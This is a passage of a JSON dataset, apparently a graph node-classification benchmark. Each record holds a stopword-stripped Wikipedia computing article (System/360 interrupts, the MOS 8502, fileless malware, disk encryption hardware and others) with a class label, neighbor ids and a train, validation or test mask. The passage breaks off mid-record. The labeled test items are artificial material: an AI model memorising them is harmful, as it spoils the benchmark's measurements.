boundary memory hence low-order bit instruction address always 0 program status word psw contains variety controls currently operating program 64-bit psw describes among things address current instruction executed condition code interrupt masks load program status word lpsw privileged instruction loads program status word psw including program mode protection key address next instruction executed lpsw often used return interruption loading old psw associated interruption class privileged instructions e.g. ssm stnsm stosm spka etcetera available manipulating subsets psw without causing interruption loading psw one non-privileged instruction spm available manipulating program mask architecture defines 5 classes interruption interruption mechanism automatically changing program state used synchronous asynchronous events two storage fields assigned class interruption s/360 old psw double-word new psw double-word processor stores psw interruption code inserted old psw location loads psw new psw location generally replaces instruction address thereby effecting branch optionally sets and/or resets fields within psw thereby effecting mode change s/360 architecture defines priority interruption class relevant two interruptions occur simultaneously interruption routine interrupted enabled interruption including another occurrence initial interruption reason normal practice specify mask bits exception machine-check mask bit 0 first-level interruption handlers second-level interruption handlers generally designed stacked interruptions multiple occurrences interruptions interruption class i/o interruption occurs completion channel program fetching ccw pci bit set also asynchronous events detected device control unit channel e.g. completion mechanical movement system stores device address interruption code stores channel status csw location 64 '40 x program interruption occurs instruction encounters one 15 exceptions however program mask bit corresponding exception 0 interruption exception 360/65 360/67 360/85 protection exception addressing exception interruptions imprecise case store instruction length code 0 interruption code may supervisor call interruption occurs result supervisor call instruction system stores bits 8-15 svc instruction interruption code external interruption occurs result certain asynchronous events bits 16-24 external old psw set 0 one bits 24-31 set 1 machine check interruption occurs report unusual conditions associated channel cpu reported another class interruption important class conditions causing machine check hardware error parity error found registers storage models may use report less serious conditions interruption code data stored scanout area '80 x 128 decimal model dependent article describes i/o cpu perspective discuss channel cable connectors summary elsewhere details found ibm literature i/o carried conceptually separate processor called channel channels instruction set access memory independently program running cpu smaller models 360/50 single microcode engine runs cpu program channel program larger models channels separate cabinets interfaces memory channel may contain multiple subchannels containing status individual channel program subchannel associated multiple devices concurrently channel programs referred shared subchannel representing single device referred unshared three types channels s/360 conceptually peripheral equipment attached s/360 control units turn attached channels however architecture require control units physically distinct practice sometimes integrated devices control similarly architecture require channels physically distinct processor smaller s/360 models 360/50 integrated channels steal cycles processor peripheral devices addressed 16-bit addresses. referred cua cuu article use term cuu high 8 bits identify channel numbered 0 6 low 8 bits identify device channel device may multiple cuu addresses control units assigned address capture range example cu might assigned range 20-2f 40-7f purpose assist connection prioritization multiple control units channel example channel might three disk control units 20-2f 50-5f 80-8f captured addresses need assigned physical device control unit also marked high low priority channel device selection progresses channel control unit order physically attached channel end chain selection process continues reverse back towards channel selection returns channel control unit accepted command sio returns condition code 3 control units marked high priority check outbound cuu within range i/o processed selection passed next outbound cu control units marked low priority check inbound returning cuu within range i/o processed selection passed next inbound cu channel connection three controls unit channel might physically -a-b-c marked high priority would abc marked low priority would cba b marked high ac low order would bca extending line reasoning first n controllers would priority 1 high 2n-1 low second priority 2 2n-2 third priority 3 2n-3 etc last physically attached would always priority n. three storage fields reserved i/o double word i/o old psw doubleword i/o new psw fullword channel address word caw performing i/o normally requires following channel program consists sequence channel control words ccws chained together see normally channel fetches ccws consecutive doublewords control unit direct channel skip ccw transfer channel tic ccw direct channel start fetching ccws new location several defined ways channel command complete allow channel continue fetching ccws others terminate channel program general ccw chain-command bit set tic channel terminate i/o operation cause i/o interruption command completes certain status bits control unit suppress chaining common ways command complete count exhausted chain-data set control unit signal data transfers made suppress-length-indication sli set one occurs without chaining allowed common situations suppress chaining unit-exception unit-check however combination unit-check status-modifier suppress chaining rather causes channel command retry reprocessing ccw addition interruption signal sent cpu i/o operation complete channel also send program-controlled interruption pci cpu channel program running without terminating operation delayed device-end interruption i/o completion interruption conditions detected channel indicated csw conditions presented channel control unit device cases handled channel cases indicated csw distinction conditions detected control unit conditions detected device fullword channel address word caw contains 4-bit storage protection key 24-bit address channel program started channel command word doubleword containing following low order 2 4 bits determine six types operations channel performs encoding meaning high order six four bits modifier bits table depends upon type i/o device attached see e.g. dasd ckd ccws eight bits sent interpreted associated control unit functional equivalent control used cause state change device control unit often associated mechanical motion e.g. rewind seek sense used read data describing status device important case command terminates unit check specific cause determined sense examining data returned sense command modifier bits zero always valid noteworthy deviation architecture dasd use sense command codes reserve release instead using control flags ccw affect executes terminates channel status word csw provides data associated i/o interruption architecture system/360 specified existence several common functions specify means implementation allowed ibm use different physical means e.g. dial keyboard pushbutton roller image text crt selecting functions values different processors reference key switch read applying e.g. light-pen selection equivalent keyboard sequence models alignment requirements problem-state instructions relaxed mechanism turn feature programs depending receiving program check type 6 alignment instructions must modified decimal arithmetic feature provides instructions operate packed decimal data packed decimal number 1-31 decimal digits followed 4-bit sign decimal arithmetic instructions except pack unpack generate data exception digit range 0-9 sign range a-f direct control feature provides six external signal lines 8-bit data path to/from storage floating-point arithmetic feature provides 4 64-bit floating point registers instructions operate 32 64 bit hexadecimal floating point numbers 360/85 360/195 also support 128 bit extended precision floating point numbers interval timer feature installed processor decrements word location 80 '50 x regular intervals architecture specify interval require value subtracted make appear though 1 subtracted bit 23 300 times per second smaller models decremented frequency 50 hz 60 hz ac power supply larger models high resolution timer feature processor causes external interruption timer goes zero multi-system operation set features support multi-processor systems e.g. direct control direct address relocation prefixing storage protection feature installed 4-bit storage key associated every 2,048-byte block storage key checked storing address block either cpu i/o channel cpu channel key 0 disables check nonzero cpu channel key allows data stored block matching key storage protection used prevent defective application writing storage belonging operating system another application permitted testing performed along production key four bits length maximum number different applications could run simultaneously 15 additional option available models fetch protection allowed operating system specify blocks protected fetching well storing system/360 model 20 radically different considered s/360 system/360 model 44 missing certain instructions feature allowed missing instructions simulated hidden memory thus allowing use standard s/360 operating systems applications models features extended architecture e.g. emulation instructions paging models make minor deviations architecture examples include deviations served prototypes features s/370 architecture",
    "neighbors": [
      1798,
      9739,
      10508,
      8078,
      7836,
      10796,
      3630,
      9911,
      7607,
      2745,
      2811,
      11131,
      7881,
      9932,
      5457,
      2653,
      5358,
      5744,
      6515,
      3323
    ],
    "mask": "Validation"
  },
  {
    "node_id": 664,
    "label": 3,
    "text": "MOS_Technology_8502:mos technology 8502 mos technology 8502 8-bit microprocessor designed mos technology used commodore 128 based mos 6510 used commodore 64 8502 added ability optionally run double clock rate commodore 64 limitations normally vic-ii display chip 6510 share access main memory vic-ii using cycle stealing interleave accesses cpu however run double-speed enough downtime 8502 memory access timing feed vic-ii running double-speed mode 80-column vdc could fully used dedicated memory c128 40-column applications selectively disabled screen performing cpu-intensive calculations additional speed could utilized loss video output unimportant smaller speed gain 35 also possible keeping 40-column display active switching 2 mhz vic-ii drawing vertical screen border since ram access vic needed time pinout little bit different 6510 8502 extra i/o-pin built-in i/o port mapped addresses 0 1 extended 6 7 bits lacks ϕ2-pin 6510 2007 hp released hp 35s calculator uses sunplus technology generalplus splb31a/gplb31a embedded chip integrating 8502 microprocessor core alongside lc display i/o controllers hp 17bii+ hp 12c prestige well revised version hp 12c platinum hp 12c platinum 25th anniversary edition manufactured kinpo electronics also based chip",
    "neighbors": [
      11395,
      10767,
      10784,
      4385,
      7589,
      11054,
      2874,
      3010,
      3157,
      6485,
      10969,
      3680,
      5862,
      10351,
      1776,
      4337,
      5617,
      7281,
      7282,
      7284
    ],
    "mask": "Test"
  },
  {
    "node_id": 665,
    "label": 4,
    "text": "Eddy_Willems:eddy willems eddy willems belgian computer security expert author security blogs books active international computer security organizations speaker information security-related events eddy willems security evangelist german security software specialist g data since beginning 2010 involved anti-malware security research consultancy training communication programs press resellers end-users security evangelist started career systems analyst 1984 working insurance company challenged 1989 trojan incident fact early version ‘ ransomware ’ malware aids trojan horse system got infected inserting 5.25 ’ ’ floppy ‘ aids/hiv ’ -related information questionnaire resulting lock system request pay 189 figuring get around malware kindled eddy willems ’ interest computer viruses resulted well received solution trojan malware furthermore kick started anti-virus anti-malware career ever since eddy willems compiles maintains reference library subject viruses malware eddy willems developed career security specialist initially insurance company de vaderlandsche – today part p v followed added value distributor security products anti-virus expert noxs westcon group company security software specialist kaspersky lab benelux security evangelist expertise grew eddy willems joined international computer security organizations 1991 became founding father eicar european institute computer anti-virus research 1995 joined joe wells ’ virus wildlist reporting belgium luxembourg eicar europe may 2005 became board member eicar director press information 2009 took position director security av industry relationships 2010 eddy willems became member pr officer amtso anti-malware testing standards organization joining board may 2012 belgium eddy willems member first government initiated e-security team website telecom regulator bipt-ibpt 2015 joined board lsec – leaders security association grouping security companies active belgium eu eddy willems active speakers circuit presentations companies consumers well conferences see publications section asked comments opinions radio tv-stations international cnn al jazeera national belgium vrt vtm national newspapers de standaard de morgen eddy willems regularly publishes opinions ict-magazines data news belgium zdnet.be eddy willems married son",
    "neighbors": [
      7809,
      10756,
      37,
      2213,
      43,
      5902,
      1970,
      3955,
      7515,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 666,
    "label": 3,
    "text": "NovaThor:novathor novathor platform consisting integrated system chips soc modems smartphones tablets developed st-ericsson 50/50 joint venture ericsson stmicroelectronics established february 3 2009 st-ericsson also sold socs nova modems thor separately application processor portion system successor previous nomadik line stmicroelectronics early 2009 development already begun nomadik soc called stn8500 superseded novathor family st-ericsson renamed u8500 st-nxp wireless division merged st-ericsson joint venture november 2 2011 nokia announced novathor socs power nokia future windows phone based smartphones making deviation standard use qualcomm snapdragon socs windows phones february 28 2012 st-ericsson announced would switch fully depleted silicon insulator fd-soi transistors upcoming products reduce power consumption example stated l8540 soc fd-soi transistors would consume 35 less power april 23 2012 company announced development application processors novathor moved back stmicroelectronics november 21 2012 announced st-ericsson joined sailfish alliance hence novathor modap platform would support jolla smartphones sailfish os december 10 2012 st-ericsson announced stmicroelectronics leave joint venture transition period making ericsson full owner company december 20 2012 ericsson announced buy remaining 50 stake stmicroelectronics held future company therefore remained uncertain january 30 2013 st-ericsson announced part quarterly result shipped 10.7 million u8500 novathor units fourth quarter 2012 may 28 2013 st-ericsson announced would sell assets intellectual property rights mobile connectivity global navigation satellite system gnss intel 90 million august 5 2013 ericsson stmicroelectronics completed split st-ericsson novathor since stmicroelectronics product equad quad-core chip act two performance cores 0.6 v two power-saving cores e electrical",
    "neighbors": [
      3585,
      7170,
      8720,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7235,
      7747,
      2635,
      99,
      8812,
      11374,
      10361,
      638,
      644,
      11396,
      8842,
      11405,
      146,
      659,
      1170,
      1682,
      7833,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      9928,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6925,
      2838,
      5417,
      2862,
      7988,
      10548,
      11062,
      1849,
      6971,
      6978,
      8003,
      10562,
      6981,
      3911,
      11080,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      9581,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      5028,
      7077,
      9638,
      10675,
      3511,
      9155,
      7113,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      4569,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 667,
    "label": 9,
    "text": "Jim_Brown_(computer_scientist):jim brown computer scientist james brown manager group within ibm responsible programming language apl2 program product apl2 first available ibm mainframe computers 1980 later available linux unix windows 1993 brown received kenneth e. iverson award outstanding contribution apl association computing machinery 1996 left ibm become consultant entrepreneur 1999 brown cofounded smartarrays inc. held senior position company many years firm develops specialized analytic software based columnar databases memory-resident vector processing uses customers consider commercial off-the-shelf software expensive slow limited",
    "neighbors": [
      9993,
      1178,
      8987,
      10668,
      823,
      4921,
      9019,
      1099,
      7630,
      2519,
      11099,
      1883,
      9825,
      11625,
      4331,
      2670,
      5492,
      8695,
      505,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 668,
    "label": 2,
    "text": "James_Clark_(programmer):james clark programmer james clark time datetime= 1964-02-23 23 february 1964 /time author groff expat done much work open-source software xml born london educated charterhouse merton college oxford clark lived bangkok thailand since time 1995 /time permanent resident owns company called thai open source software center provides legal framework open-source activities gnu project wrote groff well xml editing mode gnu emacs james clark served technical lead working group developed xml—notably contributing self-closing empty-element tag syntax example codice_1 name dfn style= font-style italic xml /dfn contributions xml cited dozens books subject james author co-author number influential specifications implementations including listed part working group developed java streaming api xml stax jsr 173 jcp time datetime= 2004-11 november 2004 /time late time 2006 /time clark worked thailand software industry promotion agency sipa promote open source technologies open standards country work included pushing thai localization openoffice.org office suite mozilla firefox web browser along open source software packages projects sipa include",
    "neighbors": [
      8549,
      502,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 669,
    "label": 2,
    "text": "Nokia_E75:nokia e75 nokia e75 smartphone eseries range side sliding qwerty keyboard also front keypad optional dvb-h digital video broadcasting handsets nokia mobile tv receiver su-33w possible watch television screen phone",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      659,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 670,
    "label": 8,
    "text": "WebSTAR:webstar webstar web server application classic mac os supported common gateway interface cgi appleevents-based w*api plug-in support well ssl similar technologies used early web servers unlike servers era webstar mac-like terms installation maintenance using number appleevents-based macos programs tasks webstar also part apple internet server solution package internet server software certain models powermac machines one popular use webstar combination filemaker make simple database-driven online applications product traces roots earlier machttp released shareware chuck shotton 1993 starnine licensed machttp released greatly upgraded webstar 1995 starnine purchased quarterdeck office systems shortly release along many upgrades webstar company also released quarterdeck mail mac little-known microsoft windows version webstar quickly disappeared quarterdeck sold entire starnine division holding company 1998 sold turn aci 2000 released carbon version mac os x 2001 added ability directly run unix-based cgis several releases aci known 4d inc. sold line kerio technologies 2006 entire line dormant",
    "neighbors": [
      576,
      225,
      2563,
      11688,
      6797,
      2478,
      5492,
      1215
    ],
    "mask": "None"
  },
  {
    "node_id": 671,
    "label": 2,
    "text": "Fiwix:fiwix fiwix operating system kernel based unix architecture fully focused posix compatible designed developed mainly hobby os also serves educational purposes runs 32-bit x86 hardware platform compatible good base existing gnu applications follows system v application binary interface also linux 2.0 system call abi mostly compatible gnu/fiwix operating system uses fiwix kernel includes gnu toolchain gcc binutils make uses newlib v2.2.0 system c library primary file system minix v2 limits file names 30 character length maximum file system size 1gb features according official website include",
    "neighbors": [
      6787,
      5380,
      11012,
      6412,
      4750,
      2322,
      2197,
      5397,
      1304,
      3487,
      5413,
      3241,
      4398,
      7983,
      3248,
      8110,
      2995,
      8115,
      8499,
      9141,
      823,
      9784,
      7483,
      9151,
      4929,
      9921,
      10436,
      8262,
      11601,
      477,
      6369,
      5363,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 672,
    "label": 6,
    "text": "Disk_encryption_hardware:disk encryption hardware computer security technique called disk encryption used protect confidentiality data stored computer disk article discusses disk encryption hardware used implement technique cryptographic aspects problem see disk encryption compared access restrictions commonly enforced os technique protects data even os active example data read directly hardware hardware designed particular purpose often achieve better performance disk encryption software disk encryption hardware made transparent software encryption done software soon key initialized hardware principle completely transparent os thus work os disk encryption hardware integrated media media may designed better integration one example design would use physical sectors slightly larger logical sectors hardware solutions also criticised poorly documented many aspects encryption done published vendor leaves user little possibility judge security product potential attack methods also increases risk vendor lock-in addition implementing hardware-based full disk encryption prohibitive many companies due high cost replacing existing hardware makes migrating hardware encryption technologies difficult would generally require clear migration central management solution hardware- software-based full disk encryption solutions",
    "neighbors": [
      3880,
      7983,
      5552,
      7794,
      7229,
      3572,
      4221,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 673,
    "label": 2,
    "text": "/e/_(operating_system):/e/ operating system /e/ formerly eelo free open-source operating system smartphones android mobile platform fork lineageos operating system developed e foundation founded gaël duval /e/ marketed privacy software contain proprietary google apps services 2017 duval series articles titled leaving apple google /e/ odyssey proposed concept operating system without privacy-invasive software followed kickstarter crowdfunding campaign os initially named eelo name subsequently changed /e/ due copyright issues first beta version based lineageos 14.1 released september 12 2018 source code gitlab latest beta version milestone 0.7 based lineageos 14.1 lineageos 15.1 released june 26 2019 operating system includes set pre-installed mobile apps /e/ include google apps normally pre-installed android phones /e/ offers several unique features lineageos include features 30 april 2019 /e/ officially builds 81 devices including essential phone fairphone samsung xiaomi devices official builds labelled nightly although generally released every couple days /e/ active user base thousand users interact users provide support /e/ team uses telegram channels discussion forum",
    "neighbors": [
      4611,
      5637,
      3079,
      11271,
      8719,
      3600,
      3089,
      4113,
      8209,
      7700,
      8727,
      9244,
      11294,
      543,
      11297,
      7204,
      9253,
      11305,
      1578,
      3626,
      7722,
      5677,
      7727,
      56,
      3129,
      4153,
      59,
      1083,
      8248,
      9276,
      4673,
      6212,
      69,
      3654,
      5190,
      8262,
      3147,
      2125,
      4685,
      7246,
      3664,
      1107,
      7253,
      1110,
      8280,
      89,
      3162,
      5721,
      8285,
      607,
      4192,
      2658,
      3685,
      6763,
      10860,
      5742,
      2671,
      8315,
      8316,
      8829,
      11388,
      11391,
      2692,
      8837,
      1670,
      8329,
      9353,
      5262,
      9873,
      11410,
      8857,
      10393,
      7835,
      10394,
      6301,
      6302,
      5279,
      10397,
      3745,
      1700,
      7332,
      7845,
      1191,
      8870,
      10920,
      9899,
      3245,
      7854,
      3248,
      7857,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      196,
      2763,
      8907,
      3791,
      6352,
      4305,
      2259,
      7385,
      11481,
      8413,
      9949,
      1255,
      8423,
      4841,
      6890,
      7913,
      6380,
      8940,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      2303,
      4355,
      5892,
      7428,
      7435,
      2828,
      4364,
      2321,
      5397,
      6934,
      4887,
      280,
      10009,
      10525,
      798,
      4383,
      288,
      8992,
      10530,
      2852,
      2853,
      6436,
      8486,
      3369,
      10537,
      7983,
      3380,
      823,
      5431,
      2875,
      3387,
      3900,
      7483,
      3903,
      10045,
      11587,
      7492,
      2375,
      5959,
      11082,
      332,
      3409,
      8019,
      2901,
      9048,
      5467,
      10080,
      8033,
      2914,
      3940,
      5990,
      10599,
      9064,
      7020,
      2925,
      7534,
      11121,
      9074,
      7548,
      11648,
      4995,
      390,
      1416,
      905,
      9610,
      10127,
      912,
      10129,
      5522,
      1427,
      10645,
      10646,
      11669,
      926,
      9119,
      2978,
      10149,
      1959,
      6055,
      937,
      5546,
      6057,
      7082,
      7595,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      2001,
      3542,
      9689,
      2010,
      9693,
      479,
      485,
      10215,
      1516,
      5100,
      5613,
      495,
      8177,
      5620,
      8180,
      5110,
      11252,
      2045,
      11263
    ],
    "mask": "Train"
  },
  {
    "node_id": 674,
    "label": 8,
    "text": "Heeii:heeii heeii formerly known elkoog b.v. company based groningen netherlands provides recommendation service web browsers means plug-in website visitors use heeii recommendations able get appropriate content links result reaching online objectives heeii combining human computer interaction research software engineering techniques understand implicit emergent behaviors web surfers based array implicit behaviors heeii ’ technology discerns user ’ intent dynamically connects content based collective wisdom visitors similar interests heeii built technology many social principles popularized books long tail wisdom crowds implicit approaches one heeii implements collects community wisdom emerges web observing user behaviors see comparison active passive filtering company founded 2006 edwin kuipers headquartered groningen netherlands elkoog able start taking round angel funding various close business relations friends funding round came approximately 750,000 early 2007 concept proven feasible heeii scales non-linearly always available respond rapidly financing sufficient infrastructure realized elkoog took round angel funding venture capital fund called knowledge conversion fund ir g.j smid fund foundation second funding round came approximately 1.6 million beginning 2009 company raised additional 2.6 million marketing netherlands company home base rest world also early 2009 heeii received academic accreditation becoming member expertise center target building sustainable economic cluster intelligent sensor network information systems northern part netherlands aimed data management large amounts data prominent scientific research groups innovative businesses jointly develop improve complex scalable data systems starting point target paradigm full integration large-scale data processing archiving analysis experimental surroundings target model developed actual market applications participants follow-up projects develop products services target collaboration target ’ secretary university groningen partners drew innovative program 32 million euros total investing total sum almost 16 million euros",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 675,
    "label": 4,
    "text": "Fileless_malware:fileless malware fileless malware variant computer related malicious software exists exclusively computer memory-based artifact i.e ram write part activity computer hard drive meaning resistant existing anti-computer forensic strategies incorporate file-based whitelisting signature detection hardware verification pattern-analysis time-stamping etc. leaves little way evidence could used digital forensic investigators identify illegitimate activity malware type designed work in-memory longevity system exists system rebooted fileless malware sometimes considered synonymous in-memory malware perform core functionalities without writing data disk lifetime operation led commentators claim variant strain nothing new simply “ redefinition well-known term memory resident virus ” whose pedigree traced back 1980s birth lehigh virus developed originator term fred cohen became influential paper topic synonymy however incorrect although aforementioned behavioral execution environment cases i.e malware variants executed system memory crucial differentiation method inception prolongation malware ’ infection vector involves writing hard disk order executed whose origin could take form infected file attachment external media device e.g usb peripheral mobile phone etc. browser drive-by side-channel etc aforementioned methods contact host system ’ hard drive form another meaning even employing stealthiest anti-forensic methods form infected residue left host media fileless malware hand point inception process termination usually way system reboot aims never contents written disk purpose reside volatile system areas system registry in-memory processes service areas fileless malware evolutionary strain malicious software taken steady model self-improvement/enhancement drive towards clearly defined focused attack scenarios whose roots traced back terminate-and-stay-resident/memory resident viral programs launched would reside memory awaiting system interrupt gaining access control flow examples seen viruses frodo dark avenger number beast techniques evolved way temporary memory resident viruses seen famous examples anthrax monxla took truer fileless nature way in-memory injected network viruses/worms codered slammer modern evolutionary incarnations seen viruses stuxnet duqu poweliks phasebot etc february 8 2017 kaspersky lab global research analysis team published report titled fileless attacks enterprise networks implicates variants type malware latest incarnations affecting 140 enterprise networks across globe banks telecommunication companies government organisations top targets report details variant fileless malware using powershell scripts located within microsoft windows registry system launch attack target ’ machine leveraging common attack framework called metasploit supporting attack tools mimikatz leveraging standard windows utilities ‘ sc ’ ‘ netsh ’ assist lateral movement malware detected bank identified metasploit meterpreter code running physical memory central domain controller dc kaspersky labs company identified emerging trends principal security anti-malware companies coming forward similar findings symantec trend micro mcafee labs cybereason etc emergence malware operate fileless way presents major problem digital forensic investigators whose reliance able obtain digital artifacts crime scene critical ensuring chain custody producing evidence admissible court law many well-known digital forensic process models casey 2004 dfrws 2001 nij 2004 cohen 2009 embed either examination and/or analysis phase respective models implying evidence obtained/collected/preserved mechanism difficulty becomes apparent considering standard operating procedures digital investigators deal computer crime scene traditional methods direct investigator fileless malware subverts forensics models evidence acquisition take place memory image obtained live running system investigated method however compromise acquired host ’ memory image render legal admissibility questionable least instill enough reasonable doubt weight evidence presented may drastically reduced increasing chances trojan horse dude done defences may used effectively renders type malware extremely attractive adversaries wishing secure foothold network perform difficult trace lateral movement quick silent manner standard forensic investigatory practices ill-prepared threat",
    "neighbors": [
      3867,
      7809,
      3843,
      4389,
      7369,
      4811,
      3852,
      2383,
      9460,
      1429,
      3704,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 676,
    "label": 1,
    "text": "Flag_state:flag state flag state merchant vessel jurisdiction whose laws vessel registered licensed deemed nationality vessel merchant vessel must registered registered one jurisdiction may change register registered flag state authority responsibility enforce regulations vessels registered flag including relating inspection certification issuance safety pollution prevention documents ship operates laws flag state laws applicable ship involved admiralty case term flag convenience describes business practice registering merchant ship state ship owners flying state civil ensign ship ships may registered flags convenience reduce operating costs avoid regulations avoid inspection scrutiny owner country normally nationality i.e. flag ship determines taxing jurisdiction since flag right declaration 1921 recognised states—including land-locked countries—have right maintain ship register ship ’ flag state failure flag states comply survey certification responsibilities especially flag-of-convenience states delegated task classification societies number states since 1982 established port state controls foreign-registered ships entering jurisdiction january 2010 panama world largest flag state almost quarter world ocean-going tonnage registered united states united kingdom 1 world war ii nations able maintain dominance cases even improve position maritime trade offering vessels exclusive protection flying flags would turn give nation exclusive control vessels shipowners time needed protection pirates privateers provided naval vessels flag state cases states offered subsidies shipbuilding industries addition incentives states might impose restrictions based flag state closing ports ships one well known example applied case england restricted import asian goods american british vessels england opened ports maneuvered position strength like gain access continental ports similarly france imposed trade monopoly colonies remained place 1869 ships must registered ship register jurisdiction whose flag flying flag registers many countries open ships foreign owners normally flag state one ship register several countries one register flag state set flag state control system",
    "neighbors": [
      2311,
      10408,
      41,
      11369,
      5419,
      3090,
      5147,
      10941
    ],
    "mask": "Test"
  },
  {
    "node_id": 677,
    "label": 2,
    "text": "Linux_India:linux india linux india informally organized community mailing lists founded around 1997 arun sharma karra dakshinamurthy help newcomers linux operating system discussion forum linux enthusiasts india initial days mailing lists administered moderated sudhakar chandrasekharan aka thaths late 1990s linux begun getting lot exposure india computer magazines enthusiasts adoption linux slow bandwidth india prohibitively expensive time technology magazines like pcquest chip magazine others began bringing linux special issues including cover cds containing full distributions cds helped introduce linux many could afford costs downloading publications became important source linux distributions india formal informal linux user groups sprung around time first best known one time bharat linux user group formed early 1997 nit surat svnit see description administered final year student suman saraf saraf left college group continued hosted nit surat two years superseded linux india many academic institutions including tata institute fundamental research mumbai national centre software technology mumbai indian institute science bangalore indian institute technology chennai already heavy users linux time many semi-formal user groups including mailing lists support 1997 1999 linux india mailing list grew focusing largely helping people technical issues related installing running linux pcs linux india became kind de facto umbrella various linux users groups across india users smaller towns lug often joined linux india met sufficient critical mass people interested linux area formed local lug november 1999 linux community bangalore participated technology industry exhibition broader adoption linux companies like gt also began selling cheap linux cds india result growth linux india mailing list split three—linux india help lih linux india general lig linux india programmers lip —in november 1999 web site created irc server defunct irc.linux-india.org started old-timers channel irc.freenode.net mailing lists still functional veterans still subscribe though number daily messages reduced almost every major city/state lug mailing lists discuss issues mailing lists subscribed sourceforge page linked www.linux-india.org 2000 attempt made formalize linux india registered organization one reasons repeat event november 1999 scheduled bangalore sponsors linux presence event felt need work formal organization order avoid inadvertently getting political cross-fire representatives known lugs invited join new private mailing list called li-reg list discussed whether linux india formalized various lugs related linux india considerable difference opinion among representatives whether need formalize nationwide organization felt important formal organization deal industry others felt things fine way without need formal organization consensus reached two months discussions idea formalizing linux india dropped re-attempted since archives li-reg mailing list available online 2001 administrator mailing lists resigned lists moved sourceforge resided since founded around july 2004 freenode become premier irc channel linux/foss enthusiasts india channel usually 30 50 members time members india biggest contingents delhi mumbai chennai channel holds loose allegiance dormant indian linux users group channel old-timers regulars include particular order oldmonk f3ew hobbes no_mind baks17 vivekvc binand viksit jace tazz stephdg z00dax gora svaksha jeevan_ullas ramkrsna t3rmin4t0r mary lap_64 koolhead killerx 2008 mailing list named linux-india-channel created facilitate channel irc channel regulars channel operators discuss irc channel policy relevant discussions related linux india irc channel",
    "neighbors": [
      7983,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 678,
    "label": 4,
    "text": "Information_Security_Automation_Program:information security automation program information security automation program isap pronounced “ sap ” u.s. government multi-agency initiative enable automation standardization technical security operations u.s. government initiative standards based design benefit information technology security operations isap high level goals include standards based automation security checking remediation well automation technical compliance activities e.g fisma isap ’ low level objectives include enabling standards based communication vulnerability data customizing managing configuration baselines various products assessing information systems reporting compliance status using standard metrics weight aggregate potential vulnerability impact remediating identified vulnerabilities isap ’ technical specifications contained related security content automation protocol scap isap ’ security automation content either contained within referenced national vulnerability database isap formalized trilateral memorandum agreement moa defense information systems agency disa national security agency nsa national institute standards technology nist office secretary defense osd also participates department homeland security dhs funds operation infrastructure isap relies i.e. national vulnerability database document incorporates text information security automation program overview v1 beta public domain publication u.s government",
    "neighbors": [
      7887,
      635,
      5780,
      575
    ],
    "mask": "None"
  },
  {
    "node_id": 679,
    "label": 3,
    "text": "Department_of_Computer_Science,_University_of_Illinois_at_Urbana–Champaign:department computer science university illinois urbana–champaign department computer science cs university illinois urbana-champaign consistently ranked top computer science program world 2018 u.s. news world report rank uiuc computer science top 5 cs graduate school program nation university illinois urbana-champaign ranked one top 5 undergraduate schools computer engineering csrankings.org puts uiuc top 5 computer science schools world publications research output top conferences past 10 years since reorganization 1964 department computer science produced myriad publications research advanced field computer science addition many faculty alumni leads modern-day applications mosaic web browser paypal youtube 1949 university illinois created digital computer laboratory following joint funding university u.s. army create ordvac illiac computers direction physicist ralph meagher ordvac illiac computers two earliest von-neumann architecture machines constructed completed 1952 illiac inspired machines mistic musasino-1 silliac cyclone well providing impetus university continue research computing illiac ii project yet despite advances high-performance computing faculty digital computer laboratory continued conduct research fields computing well human-computer interaction plato project first computer music illiac suite computational numerical methods work donald b. gillies james e. robertson r co-inventor srt division algorithm name given explosion research computing 1964 university illinois reorganized digital computer laboratory department computer science 1967 department awarded first phd master degrees computer science 1982 uiuc physicist larry smarr wrote blistering critique america supercomputing resources result national science foundation established uiuc national center supercomputing applications 1985 ncsa one first places industry academia develop software 3 major operating systems time macintosh pc unix ncsa 1986 released ncsa telnet 1993 released mosaic web browser 2004 department computer science moved digital computer laboratory building thomas m. siebel center computer science following gift alumnus thomas siebel 2017-2018 academic year total 2702 students department 1787 undergraduate 915 graduate average salary reported 2016-2017 graduates 96,518 85 full-time faculty members fields department offers nine undergraduate degree programs leading bachelor science degrees four different colleges department also sponsors minor computer science available uiuc students department also offers two 5-year bachelors/masters programs college engineering bachelor science/master science b.s./m.s computer science bachelors science/masters computer science b.s./m.c.s",
    "neighbors": [
      5509,
      3462,
      6791,
      9224,
      1807,
      10134,
      7069,
      1443,
      6698,
      9259,
      6320,
      2485,
      2629,
      7493,
      9932,
      2518,
      11225,
      1890,
      4837,
      9718,
      2427
    ],
    "mask": "Test"
  },
  {
    "node_id": 680,
    "label": 3,
